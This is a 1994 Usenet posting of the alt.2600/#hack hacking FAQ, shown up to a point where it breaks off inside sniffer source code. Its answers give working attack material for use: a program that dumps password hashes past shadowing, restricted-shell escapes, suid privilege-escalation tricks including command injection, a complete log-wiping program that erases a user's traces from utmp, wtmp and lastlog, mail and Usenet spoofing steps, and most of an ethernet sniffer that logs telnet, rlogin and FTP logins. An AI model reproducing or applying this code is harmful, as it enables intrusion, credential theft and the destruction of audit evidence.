Path: bloom-beacon.mit.edu!news.bu.edu!olivea!hookup!news.sprintlink.net!howland.reston.ans.net!swiss.ans.net!potogold.rmii.com!rainbow.rmii.com!not-for-mail

From: will@rmii.com (Will Spencer)

Newsgroups: alt.2600

Subject: alt.2600 FAQ Beta .009 <repost>

Followup-To: alt.2600

Date: 16 Dec 1994 14:43:58 -0700

Organization: Rocky Mountain Internet Inc.

Lines: 4461

Message-ID: <3ct1mu$28p@rainbow.rmii.com>

Reply-To: will@gnu.ai.mit.edu (FAQ Comments address)

NNTP-Posting-Host: rainbow.rmii.com

Summary: This posting contains a list of Frequently Asked

	 Questions (and their answers) about hacking.  It

	 should be read by anyone who wishes to post to the

	 alt.2600 newsgroup or use the IRC channel #hack.

Archive-name: alt-2600-faq

Posting-Frequency: Random

Last-Modified: 1994/11/20

Version: Beta .009





Editors Note: Welcome to Beta .009 of the alt.2600/#hack FAQ!



              Thanks go out to Kevin Martinez (lps@rahul.net) for

              being the first ftp site to support the alt.2600/#hack

              FAQ.



              I am looking for a volunteer to convert the FAQ to HTML

              format.  If you have the time, please e-mail me.

              

              If you have a questions regarding any of the topics

              covered in the FAQ, please direct it to alt.2600 or

              #hack.  Please do not e-mail me with them, I'm getting

              swamped.



	      If your copy of the #hack FAQ does not end with the

	      letters EOT on a line by themselves, you do not have the

	      entire FAQ.





                                 ** BETA **



                             Beta Revision .009



			    alt.2600/#Hack F.A.Q.



				    by

				  Voyager

			    will@gnu.ai.mit.edu



				Sysop of

			     Hacker's Haven

			      (303)343-4053



			   With special thanks to:



        A-Flat, Al, Aleph1, Bluesman, C-Curve, Edison, KCrow, Major,

        Presence, Rogue Agent, sbin, Taran King, Tomes and TheSaint.





		       We work in the dark

		       We do what we can

		       We give what we have

		       Our doubt is our passion,

		       and our passion is our task

		       The rest is the madness of art.



				-- Henry James







Section A: Computers



  01. How do I access the password file under Unix?

  02. How do I crack Unix passwords?

  03. What is password shadowing?

  04. Where can I find the password file if it's shadowed?

  05. What is NIS/yp?

  06. What are those weird characters after the comma in my passwd file?

  07. How do I access the password file under VMS?

  08. How do I crack VMS passwords?

  09. How do I break out of a restricted shell?

  10. How do I gain root from a suid script or program?

  11. How do I erase my presence from the system logs?

U 12. How do I send fakemail?

  13. How do I fake posts to UseNet?

  14. How do I hack ChanOp on IRC?

  15. How do I modify the IRC client to hide my real username?

  16. How to I change to directories with strange characters in them?

U 17. What is ethernet sniffing?

  18. What is an Internet Outdial?

  19. What are some Internet Outdials?

  20. What is this system?

U 21. What are the default accounts for XXX ?

  22. What port is XXX on?

  23. What is a trojan/worm/virus/logic bomb?

  24. How can I protect myself from virii and such?

  25. What is Cryptoxxxxxxx?

  26. What is PGP?

  27. What is Tempest?

  28. What is an anonymous remailer?

U 29. What are the addresses of some anonymous remailers?

  30. How do I defeat copy protection?

N 31. What is 127.0.0.1?





Section B: Telephony



  01. What is a Red Box?

  02. How do I build a Red Box?

  03. Where can I get a 6.5536Mhz crystal?

  04. Which payphones will a Red Box work on?

  05. What is a Blue Box?

  06. Do Blue Boxes still work?

  07. What is a Black Box?

  08. What do all the colored boxes do?

  09. What is an ANAC number?

U 10. What is the ANAC number for my area?

  11. What is a ringback number?

U 12. What is the ringback number for my area?

  13. What is a loop?

U 14. What is a loop in my area?

  15. What is a CNA number?

  16. What is the telephone company CNA number for my area?

U 17. What are some numbers that always ring busy?

U 18. What are some numbers that temporarily disconnect phone service?

  19. What is scanning?

  20. Is scanning illegal?

  21. Where can I purchase a lineman's handset?

  22. What are the DTMF frequencies?

N 23. What are the frequencies of the telephone tones?

  24. What are all of the * codes?

  25. What frequencies do cordless phones operate on?





Section C: Resources



U 01. What are some ftp sites of interest to hackers?

U 02. What are some newsgroups of interest to hackers?

  03. What are some telnet sites of interest to hackers?

U 04. What are some gopher sites of interest to hackers?

U 05. What are some World wide Web (WWW) sites of interest to hackers?

U 06. What are some IRC channels of interest to hackers?

U 07. What are some BBS's of interest to hackers?

U 08. What books are available on this subject?

U 09. What are some mailing lists of interest to hackers?

U 10. What are some print magazines of interest to hackers?

  11. What are some organizations of interest to hackers?

U 12. Where can I purchase a magnetic stripe encoder/decoder?



Section D: 2600



  01. What is alt.2600?

  02. What does "2600" mean?

  03. Are there on-line versions of 2600 available?

  04. I can't find 2600 at any bookstores.  What can I do?

  05. Why does 2600 cost more to subscribe to than to buy at a newsstand?





Section E: Miscellaneous



U 01. What does XXX stand for?

  02. How do I determine if I have a valid credit card number?

N 03. What bank issued this credit card?

  04. What are the ethics of hacking?

U 05. Where can I get a copy of the #hack FAQ?







U == Updated since last release of the #hack FAQ

N == New since last release of the #hack FAQ









Section A: Computers

~~~~~~~~~~~~~~~~~~~~



01. How do I access the password file under Unix?



In standard Unix the password file is /etc/passwd.  On a Unix system

with either NIS/yp or password shadowing, much of the password data

may be elsewhere.





02. How do I crack Unix passwords?



Contrary to popular belief, Unix passwords cannot be decrypted.  Unix

passwords are encrypted with a one way function.  The login program

encrypts the text you enter at the "password:" prompt and compares

that encrypted string against the encrypted form of your password.



Password cracking software uses wordlists.  Each word in the wordlist

is encrypted with each of the 4096 possible salt values and the

results are compared to the encrypted form of the target password.



The best cracking program for Unix passwords is currently Crack by

Alec Muffett.  For PC-DOS, the best package to use is currently

CrackerJack.





03. What is password shadowing?



Password shadowing is a security system where the encrypted password

field of /etc/passwd is replaced with a special token and the

encrypted password is stored in a separate file which is not readable

by normal system users.



To defeat password shadowing on many (but not all) systems, write a

program that uses successive calls to getpwent() to obtain the

password file.



Example:



#include <pwd.h>

main()

{

struct passwd *p;

while(p=getpwent())

printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,

p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);

}





04. Where can I find the password file if it's shadowed?



Unix                  Path                            Token

-----------------------------------------------------------------

AIX 3                 /etc/security/passwd            !

       or             /tcb/auth/files/<first letter   #

                            of username>/<username>

A/UX 3.0s             /tcb/files/auth/?/*

BSD4.3-Reno           /etc/master.passwd              *

ConvexOS 10           /etc/shadpw                     *

ConvexOS 11           /etc/shadow                     *

DG/UX                 /etc/tcb/aa/user/               *

EP/IX                 /etc/shadow                     x

HP-UX                 /.secure/etc/passwd             *

IRIX 5                /etc/shadow                     x

Linux 1.1             /etc/shadow                     *

OSF/1                 /etc/passwd[.dir|.pag]          *

SCO Unix #.2.x        /tcb/auth/files/<first letter   *

                            of username>/<username>

SunOS4.1+c2           /etc/security/passwd.adjunct    ##username

SunOS 5.0             /etc/shadow

                      <optional NIS+ private secure maps/tables/whatever>

System V Release 4.0  /etc/shadow                     x

System V Release 4.2  /etc/security/* database

Ultrix 4              /etc/auth[.dir|.pag]            *

UNICOS                /etc/udb                        *





05. What is NIS/yp?



NIS (Network Information System) in the current name for what was once

known as yp (Yellow Pages).  The purpose for NIS is to allow many

machines on a network to share configuration information, including

password data. NIS is not designed to promote system security.  If

your system uses NIS you will have a very short /etc/passwd file with

a line that looks like this:



+::0:0:::



To view the real password file use this command "ypcat passwd"





06. What are those weird characters after the comma in my passwd file?



The characters are password aging data.  Password aging forces the

user to change passwords after a System Administrator specified period

of time.  Password aging can also force a user to keep a password for

a certain number of weeks before changing it.



]

] Sample entry from /etc/passwd with password aging installed:

]

] will:5fg63fhD3d,M.z8:9406:12:Will Spencer:/home/fsg/will:/bin/bash

]



Note the comma in the encrypted password field.  The characters after

the comma are used by the password aging mechanism.



]

] Password aging characters from above example:

]

] M.z8

]



The four characters are interpreted as follows:



  1: Maximum number of weeks a password can be used without changing.

  2: Minimum number of weeks a password must be used before changing.

3&4: Last time password was changed, in number of weeks since 1970.



Three special cases should be noted:



If the first and second characters are set to '..' the user will be

forced to change his/her passwd the next time he/she logs in.  The

passwd program will then remove the passwd aging characters, and the

user will not be subjected to password aging requirements again.



If the third and fourth characters are set to '..' the user will be

forced to change his/her passwd the next time he/she logs in. Password

aging will then occur as defined by the first and second characters.



If the first character (MAX) is less than the second character (MIN),

the user is not allowed to change his/her password.  Only root can

change that users password.



It should also be noted that the su command does not check the password

aging data.  An account with an expired password can be su'd to

without being forced to change the password.





                        Password Aging Codes

+------------------------------------------------------------------------+

|                                                                        |

| Character:  .  /  0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  G  H |

|    Number:  0  1  2  3  4  5  6  7  8  9 10 11 12 13 14 15 16 17 18 19 |

|                                                                        |

| Character:  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  a  b |

|    Number: 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 |

|                                                                        |

| Character:  c  d  e  f  g  h  i  j  k  l  m  n  o  p  q  r  s  t  u  v |

|    Number: 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 |

|                                                                        |

| Character:  w  x  y  z                                                 |

|    Number: 60 61 62 63                                                 |

|                                                                        |

+------------------------------------------------------------------------+





07. How do I access the password file under VMS?



Under VMS, the password file is SYS$SYSTEM:SYSUAF.DAT.  However,

unlike Unix, most users do not have access to read the password file.





08. How do I crack VMS passwords?



Write a program that uses the SYS$GETUAF functions to compare the

results of encrypted words against the encrypted data in SYSUAF.DAT.



Two such programs are known to exist, CHECK_PASSWORD and

GUESS_PASSWORD.





09. How do I break out of a restricted shell?



On poorly implemented restricted shells you can break out of the

restricted environment by running a program that features a shell

function.  A good example is vi.  Run vi and use this command:



:set shell=/bin/sh



then shell using this command:



:shell





10. How do I gain root from a suid script or program?



1. Change IFS.



If the program calls any other programs using the system() function

call, you may be able to fool it by changing IFS.  IFS is the Internal

Field Separator that the shell uses to delimit arguments.



If the program contains a line that looks like this:



system("/bin/date")



and you change IFS to '/' the shell will them interpret the

proceeding line as:



bin date



Now, if you have a program of your own in the path called "bin" the

suid program will run your program instead of /bin/date.



To change IFS, use this command:



IFS='/';export IFS      # Bourne Shell

setenv IFS '/'          # C Shell

export IFS='/'          # Korn Shell





2. link the script to -i



Create a symbolic link named "-i" to the program.  Running "-i"

will cause the interpreter shell (/bin/sh) to start up in interactive

mode.  This only works on suid shell scripts.



Example:



% ln suid.sh -i

% -i

#





3. Exploit a race condition



Replace a symbolic link to the program with another program while the

kernel is loading /bin/sh.



Example:



nice -19 suidprog ; ln -s evilprog suidroot





4. Send bad input to the program.



Invoke the name of the program and a separate command on the same

command line.



Example:



suidprog ; id





11. How do I erase my presence from the system logs?



Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text

files that can be edited by hand with vi, you must use a program

specifically written for this purpose.



Example:



#include <sys/types.h>

#include <stdio.h>

#include <unistd.h>

#include <sys/file.h>

#include <fcntl.h>

#include <utmp.h>

#include <pwd.h>

#include <lastlog.h>

#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"

 

int f;

 

void kill_utmp(who)

char *who;

{

    struct utmp utmp_ent;

 

  if ((f=open(UTMP_NAME,O_RDWR))>=0) {

     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

                 bzero((char *)&utmp_ent,sizeof( utmp_ent ));

                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

                 write (f, &utmp_ent, sizeof (utmp_ent));

            }

     close(f);

  }

}

 

void kill_wtmp(who)

char *who;

{

    struct utmp utmp_ent;

    long pos;

 

    pos = 1L;

    if ((f=open(WTMP_NAME,O_RDWR))>=0) {

 

     while(pos != -1L) {

        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

          pos = -1L;

        } else {

          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

               bzero((char *)&utmp_ent,sizeof(struct utmp ));

               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

               write (f, &utmp_ent, sizeof (utmp_ent));

               pos = -1L;

          } else pos += 1L;

        }

     }

     close(f);

  }

}

 

void kill_lastlog(who)

char *who;

{

    struct passwd *pwd;

    struct lastlog newll;

 

     if ((pwd=getpwnam(who))!=NULL) {

 

        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

            bzero((char *)&newll,sizeof( newll ));

            write(f, (char *)&newll, sizeof( newll ));

            close(f);

        }

 

    } else printf("%s: ?\n",who);

}

 

main(argc,argv)

int argc;

char *argv[];

{

    if (argc==2) {

        kill_lastlog(argv[1]);

        kill_wtmp(argv[1]);

        kill_utmp(argv[1]);

        printf("Zap2!\n");

    } else

    printf("Error.\n");

}





12. How do I send fakemail?



Telnet to port 25 of the machine you want the mail to appear to

originate from.  Enter your message as in this example:



 HELO bellcore.com

 MAIL FROM:Voyager@bellcore.com

 RCPT TO:president@whitehouse.gov

 DATA



	Please discontinue your silly Clipper initiative.

 .

 QUIT



On systems that have RFC 931 implemented, spoofing your "MAIL FROM:"

line will not work.  Test by sending yourself fakemail first.



For more informationm read RFC 822 "Standard for the format of ARPA

Internet text messages."





13. How do I fake posts to UseNet?



Use inews to post.  Give inews the following lines:



 From:

 Newsgroups:

 Subject:

 Message-ID:

 Date:

 Organization:



For a moderated newsgroup, inews will also require this line:



 Approved:



Then add your post and terminate with <Control-D>.



Example:



 From: Eric S. Real

 Newsgroups: alt.hackers

 Subject: Pathetic bunch of wannabe losers

 Message-ID: <esr.123@locke.ccil.org>

 Date: Fri, 13 Aug 1994 12:15:03

 Organization: Moral Majority



 A pathetic bunch of wannabe losers is what most of you are, with no

 right to steal the honorable title of `hacker' to puff up your silly

 adolescent egos. Get stuffed, get lost, and go to jail.



                                        Eric S. Real <esr@locke.ccil.org>





 ^D



Note that many systems will append an Originator: line to your message

header, effectively revealing the account from which the message was

posted.





14. How do I hack ChanOp on IRC?



Find a server that is split from the rest of IRC and create your own

channel there using the name of the channel you want ChanOp on.  When

that server reconnects to the net, you will have ChanOp on the real

channel.  If you have ServerOp on a server, you can cause it to split

on purpose.





15. How do I modify the IRC client to hide my real username?



Get the IRC client from cs.bu.edu /irc/clients.  Look at the source

code files irc.c and ctcp.c.  The code you are looking for is fairly

easy to spot.  Change it. Change the username code in irc.c and the

ctcp information code in ctcp.c.  Compile and run your client.



Here are the diffs from a sample hack of the IRC client.  Your client

code will vary slightly depending on what IRC client version you are

running.



*** ctcp.c.old  Wed Feb 10 10:08:05 1993

--- ctcp.c      Fri Feb 12 04:33:55 1993

***************

*** 331,337 ****

	struct  passwd  *pwd;

	long    diff;

	int     uid;

!       char    c;

  

	/*

	 * sojge complained that ircII says 'idle 1 seconds'

--- 331,337 ----

	struct  passwd  *pwd;

	long    diff;

	int     uid;

!       char    c, *fing;

  

	/*

	 * sojge complained that ircII says 'idle 1 seconds'

***************

*** 348,354 ****

	if (uid != DAEMON_UID)

	{

  #endif /* DAEMON_UID */       

!               if (pwd = getpwuid(uid))

		{

			char    *tmp;

  

--- 348,356 ----

	if (uid != DAEMON_UID)

	{

  #endif /* DAEMON_UID */       

!               if (fing = getenv("IRCFINGER"))

!                       send_ctcp_reply(from, ctcp->name, fing, diff, c);

!               else if (pwd = getpwuid(uid))

		{

			char    *tmp;

  

*** irc.c.old   Wed Feb 10 06:33:11 1993

--- irc.c       Fri Feb 12 04:02:11 1993

***************

*** 510,516 ****

		malloc_strcpy(&my_path, "/");

	if (*realname == null(char))

		strmcpy(realname, "*Unknown*", REALNAME_LEN);

!       if (*username == null(char))

	{

		if (ptr = getenv("USER"))

			strmcpy(username, ptr, NAME_LEN);

--- 510,518 ----

		malloc_strcpy(&my_path, "/");

	if (*realname == null(char))

		strmcpy(realname, "*Unknown*", REALNAME_LEN);

!       if (ptr = getenv("IRCUSER"))

!               strmcpy(username, ptr, NAME_LEN);

!       else if (*username == null(char))

	{

		if (ptr = getenv("USER"))

			strmcpy(username, ptr, NAME_LEN);





16. How to I change to directories with strange characters in them?



These directories are often used by people trying to hide information,

most often warez (commercial software).



There are several things you can do to determine what these strange

characters are.  One is to use the arguments to the ls command that

cause ls to give you more information:



From the man page for ls:



    -F   Causes directories to be marked with a trailing ``/'',

	 executable files to be marked with a trailing ``*'', and

	 symbolic links to be marked with a trailing ``@'' symbol.



    -q   Forces printing of non-graphic characters in filenames as the

	 character ``?''.



    -b   Forces printing of non-graphic characters in the \ddd

	 notation, in octal.



Perhaps the most useful tool is to simply do an "ls -al filename" to

save the directory of the remote ftp site as a file on your local

machine.  Then you can do a "cat -t -v -e filename" too see exactly

what those bizarre little characters are.



From the man page for cat:



    -v  Causes non-printing characters (with the exception of tabs,

	newlines, and form feeds) to be displayed.  Control characters

	are displayed as ^X (<Ctrl>x), where X is the key pressed with

	the <Ctrl> key (for example, <Ctrl>m is displayed as ^M).  The

	<Del> character (octal 0177) is printed as ^?.  Non-ASCII

	characters (with the high bit set) are printed as M -x, where

	x is the character specified by the seven low order bits.



    -t  Causes tabs to be printed as ^I and form feeds as ^L.  This

	option is ignored if the -v option is not specified.



    -e  Causes a ``$'' character to be printed at the end of each line

	(prior to the new-line).  This option is ignored if the -v

	option is not set.



If the directory name includes a <SPACE> or a <TAB> you will need to

enclose the entire directory name in quotes.  Example:



cd "..<TAB>"



On an IBM-PC, you may enter these special characters by holding down

the <ALT> key and entering the decimal value of the special character

on your numeric keypad.  When you release the <ALT> key, the special

character should appear on your screen.  An ASCII chart can be very

helpful.





17. What is ethernet sniffing?



Ethernet sniffing is listening (with software) to the raw ethernet

device for packets that interest you.  When your software sees a

packet that fits certain criteria, it logs it to a file.  The most

common criteria for an interesting packet is one that contains words

like "login" or "password."



Many ethernet sniffers are available, here are a few that may be on

your system now:



OS              Sniffer

~~              ~~~~~~~

HP/UX           nettl (monitor) & netfmt (display)

                nfswatch        /* Available via anonymous ftp           */

Irix            nfswatch        /* Available via anonymous ftp           */

                Etherman

SunOS           etherfind

                nfswatch        /* Available via anonymous ftp           */

Solaris         snoop

DOS             ETHLOAD         /* Available via anonymous ftp as        */

                                /* ethld104.zip                          */

                The Gobbler     /* Available via anonymous ftp           */

                LanPatrol

                LanWatch

		Netmon

                Netwatch

                Netzhack        /* Available via anonymous ftp at        */

                                /* mistress.informatik.unibw-muenchen.de */

                                /* /pub/netzhack.mac                     */

Macintosh       Etherpeek



Here is source code for an ethernet sniffer:



/* Esniff.c */



#include <stdio.h>

#include <ctype.h>

#include <string.h>



#include <sys/time.h>

#include <sys/file.h>

#include <sys/stropts.h>

#include <sys/signal.h>

#include <sys/types.h>

#include <sys/socket.h>

#include <sys/ioctl.h>



#include <net/if.h>

#include <net/nit_if.h>

#include <net/nit_buf.h>

#include <net/if_arp.h>



#include <netinet/in.h>

#include <netinet/if_ether.h>

#include <netinet/in_systm.h>

#include <netinet/ip.h>

#include <netinet/udp.h>

#include <netinet/ip_var.h>

#include <netinet/udp_var.h>

#include <netinet/in_systm.h>

#include <netinet/tcp.h>

#include <netinet/ip_icmp.h>



#include <netdb.h>

#include <arpa/inet.h>



#define ERR stderr



char    *malloc();

char    *device,

        *ProgName,

        *LogName;

FILE    *LOG;

int     debug=0;



#define NIT_DEV     "/dev/nit"

#define CHUNKSIZE   4096        /* device buffer size */

int     if_fd = -1;

int     Packet[CHUNKSIZE+32];



void Pexit(err,msg)

int err; char *msg;

{ perror(msg);

  exit(err); }



void Zexit(err,msg)

int err; char *msg;

{ fprintf(ERR,msg);

  exit(err); }



#define IP          ((struct ip *)Packet)

#define IP_OFFSET   (0x1FFF)

#define SZETH       (sizeof(struct ether_header))

#define IPLEN       (ntohs(ip->ip_len))

#define IPHLEN      (ip->ip_hl)

#define TCPOFF      (tcph->th_off)

#define IPS         (ip->ip_src)

#define IPD         (ip->ip_dst)

#define TCPS        (tcph->th_sport)

#define TCPD        (tcph->th_dport)

#define IPeq(s,t)   ((s).s_addr == (t).s_addr)



#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))



#define MAXBUFLEN  (128)

time_t  LastTIME = 0;



struct CREC {

     struct CREC *Next,

                 *Last;

     time_t  Time;              /* start time */

     struct in_addr SRCip,

                    DSTip;

     u_int   SRCport,           /* src/dst ports */

             DSTport;

     u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */

     u_int   Length;            /* current data length */

     u_int   PKcnt;             /* # pkts */

     u_long  LASTseq;

};



struct CREC *CLroot = NULL;



char *Symaddr(ip)

register struct in_addr ip;

{ register struct hostent *he =

      gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);



  return( (he)?(he->h_name):(inet_ntoa(ip)) );

}



char *TCPflags(flgs)

register u_char flgs;

{ static char iobuf[8];

#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')



  SFL(0,TH_FIN, 'F');

  SFL(1,TH_SYN, 'S');

  SFL(2,TH_RST, 'R');

  SFL(3,TH_PUSH,'P');

  SFL(4,TH_ACK, 'A');

  SFL(5,TH_URG, 'U');

  iobuf[6]=0;

  return(iobuf);

}



char *SERVp(port)

register u_int port;

{ static char buf[10];

  register char *p;



   switch(port) {

     case IPPORT_LOGINSERVER: p="rlogin"; break;

     case IPPORT_TELNET:      p="telnet"; break;

     case IPPORT_SMTP:        p="smtp"; break;

     case IPPORT_FTP:         p="ftp"; break;

     default: sprintf(buf,"%u",port); p=buf; break;

   }

   return(p);

}



char *Ptm(t)

register time_t *t;

{ register char *p = ctime(t);

  p[strlen(p)-6]=0; /* strip " YYYY\n" */

  return(p);

}



char *NOWtm()

{ time_t tm;

  time(&tm);

  return( Ptm(&tm) );

}



#define MAX(a,b) (((a)>(b))?(a):(b))

#define MIN(a,b) (((a)<(b))?(a):(b))



/* add an item */

#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \

  register struct CREC *CLtmp = \

        (struct CREC *)malloc(sizeof(struct CREC)); \

  time( &(CLtmp->Time) ); \

  CLtmp->SRCip.s_addr = SIP.s_addr; \

  CLtmp->DSTip.s_addr = DIP.s_addr; \

  CLtmp->SRCport = SPORT; \

  CLtmp->DSTport = DPORT; \

  CLtmp->Length = MIN(LEN,MAXBUFLEN); \

  bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \

  CLtmp->PKcnt = 1; \

  CLtmp->Next = CLroot; \

  CLtmp->Last = NULL; \

  CLroot = CLtmp; \

}



register struct CREC *GET_NODE(Sip,SP,Dip,DP)

register struct in_addr Sip,Dip;

register u_int SP,DP;

{ register struct CREC *CLr = CLroot;



  while(CLr != NULL) {

    if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&

        IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )

            break;

    CLr = CLr->Next;

  }

  return(CLr);

}



#define ADDDATA_NODE(CL,DATA,LEN) { \

 bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \

 CL->Length += LEN; \

}



#define PR_DATA(dp,ln) {    \

  register u_char lastc=0; \

  while(ln-- >0) { \

     if(*dp < 32) {  \

        switch(*dp) { \

            case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \

                        break; \

            case '\r': \

            case '\n': fprintf(LOG,"\n     : "); \

                        break; \

            default  : fprintf(LOG,"^%c", (*dp + 64)); \

                        break; \

        } \

     } else { \

        if(isprint(*dp)) fputc(*dp,LOG); \

        else fprintf(LOG,"(%d)",*dp); \

     } \

     lastc = *dp++; \

  } \

  fflush(LOG); \

}



void END_NODE(CLe,d,dl,msg)

register struct CREC *CLe;

register u_char *d;

register int dl;

register char *msg;

{

   fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));

   fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));

   fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));

   fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",

                        NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);

   fprintf(LOG," DATA: ");

    { register u_int i = CLe->Length;

      register u_char *p = CLe->Data;

      PR_DATA(p,i);

      PR_DATA(d,dl);

    }



   fprintf(LOG,"\n-- \n");

   fflush(LOG);



   if(CLe->Next != NULL)

    CLe->Next->Last = CLe->Last;

   if(CLe->Last != NULL)

    CLe->Last->Next = CLe->Next;

   else

    CLroot = CLe->Next;

   free(CLe);

}



/* 30 mins (x 60 seconds) */

#define IDLE_TIMEOUT 1800

#define IDLE_NODE() { \

  time_t tm; \

  time(&tm); \

  if(LastTIME<tm) { \

     register struct CREC *CLe,*CLt = CLroot; \

     LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \

     while(CLe=CLt) { \

       CLt=CLe->Next; \

       if(CLe->Time <tm) \

           END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \

     } \

  } \

}



void filter(cp, pktlen)

register char *cp;

register u_int pktlen;

{

 register struct ip     *ip;

 register struct tcphdr *tcph;



 { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);



   if(EtherType < 0x600) {

     EtherType = *(u_short *)(cp + SZETH + 6);

     cp+=8; pktlen-=8;

   }



   if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */

      return;

 }



    /* ugh, gotta do an alignment :-( */

 bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));



 ip = (struct ip *)Packet;

 if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */

    return;

 tcph = (struct tcphdr *)(Packet + IPHLEN);



 if(!( (TCPD == IPPORT_TELNET) ||

       (TCPD == IPPORT_LOGINSERVER) ||

       (TCPD == IPPORT_FTP)

   )) return;



 { register struct CREC *CLm;

   register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));

   register u_char *p = (u_char *)Packet;



   p += ((IPHLEN * 4) + (TCPOFF * 4));



 if(debug) {

  fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);

  fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));

  fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));

 }



   if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {



      CLm->PKcnt++;



      if(length>0)

        if( (CLm->Length + length) < MAXBUFLEN ) {

          ADDDATA_NODE( CLm, p,length);

        } else {

          END_NODE( CLm, p,length, "DATA LIMIT");

        }



      if(TCPFL(TH_FIN|TH_RST)) {

          END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );

      }



   } else {



      if(TCPFL(TH_SYN)) {

         ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);

      }



   }



   IDLE_NODE();



 }



}



/* signal handler

 */

void death()

{ register struct CREC *CLe;



    while(CLe=CLroot)

        END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");



    fprintf(LOG,"\nLog ended at => %s\n",NOWtm());

    fflush(LOG);

    if(LOG != stdout)

        fclose(LOG);

    exit(1);

}



/* opens network interface, performs ioctls and reads from it,

 * passing data to filter function

 */

void do_it()

{

    int cc;

    char *buf;

    u_short sp_ts_len;



    if(!(buf=malloc(CHUNKSIZE)))

        Pexit(1,"Eth: malloc");



/* this /dev/nit initialization code pinched from etherfind */

  {

    struct strioctl si;

    struct ifreq    ifr;

    struct timeval  timeout;

    u_int  chunksize = CHUNKSIZE;

    u_long if_flags  = NI_PROMISC;



    if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)

        Pexit(1,"Eth: nit open");



    if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)

        Pexit(1,"Eth: ioctl (I_SRDOPT)");



    si.ic_timout = INFTIM;



    if(ioctl(if_fd, I_PUSH, "nbuf") < 0)

        Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");



    timeout.tv_sec = 1;

    timeout.tv_usec = 0;

    si.ic_cmd = NIOCSTIME;

    si.ic_len = sizeof(timeout);

    si.ic_dp  = (char *)&timeout;

    if(ioctl(if_fd, I_STR, (char *)&si) < 0)

        Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");



    si.ic_cmd = NIOCSCHUNK;

    si.ic_len = sizeof(chunksize);

    si.ic_dp  = (char *)&chunksize;

    if(ioctl(if_fd, I_STR, (char *)&si) < 0)

        Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");



    strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));

    ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';

    si.ic_cmd = NIOCBIND;

    si.ic_len = sizeof(ifr);

    si.ic_dp  = (char *)&ifr;

    if(ioctl(if_fd, I_STR, (char *)&si) < 0)

        Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");



    si.ic_cmd = NIOCSFLAGS;

    si.ic_len = sizeof(if_flags);

    si.ic_dp  = (char *)&if_flags;

    if(ioctl(if_fd, I_STR, (char *)&si) < 0)

        Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");



    if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)

        Pexit(1,"Eth: ioctl (I_FLUSH)");

  }



    while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {

        register char *bp = buf,

                      *bufstop = (buf + cc);



        while (bp < bufstop) {

            register char *cp = bp;

            register struct nit_bufhdr *hdrp;



            hdrp = (struct nit_bufhdr *)cp;

            cp += sizeof(struct nit_bufhdr);

            bp += hdrp->nhb_totlen;

            filter(cp, (u_long)hdrp->nhb_msglen);

        }

    }

    Pexit((-1),"Eth: read");

}

 /* Authorize your proogie,generate your own password and uncomment here */

/* #define AUTHPASSWD "EloiZgZejWyms" */



void getauth()

